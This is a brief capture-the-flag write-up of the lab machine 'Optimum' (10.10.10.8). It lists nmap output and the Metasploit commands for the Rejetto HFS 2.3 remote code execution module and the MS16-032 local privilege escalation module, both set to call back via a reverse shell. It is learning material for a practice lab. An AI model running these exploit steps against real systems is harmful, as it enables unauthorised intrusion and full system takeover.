# Optimum
> # 10.10.10.8

nmap
>[80/tcp](portscan.md#80) open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /

There's only a [website](http://10.10.10.8/) on the port 80, a HttpFileServer 2.3
![[optimum1.png]]
Quick research on google and a [module of metasploit](https://www.rapid7.com/db/modules/exploit/windows/http/rejetto_hfs_exec/) shows up
>use windows/http/rejetto_hfs_exec
>set rhost 10.10.10.8
>set lhost tun0
>exploit


![[optimum2.png]]
we're user!

Now first thing first, let's check the sysinfo:

![[optimum4.png]]
We're on a Windows 2012 R2 machine, let's see what google have to offer for this OS privilege escalation
[Something funny tbh](https://vk9-sec.com/microsoft-windows-7-10-2008-2012-r2-x86-x64-local-privilege-escalation-ms16-032-2016-0099/):
>The Secondary Logon Service in Microsoft Windows Server 2012  R2 does not properly process request handles, which allows local users to gain privileges via a crafted application, aka "Secondary Logon Elevation of Privilege Vulnerability."

Put the current session in background, load the new module, set the session and run it
>background
>use windows/local/ms16_032_secondary_logon_handle_privesc
>set session 1
>set lhost tun0
>exploit

![[optimum5.png]]
And here we go, we're root.
#machine #msf #windows2012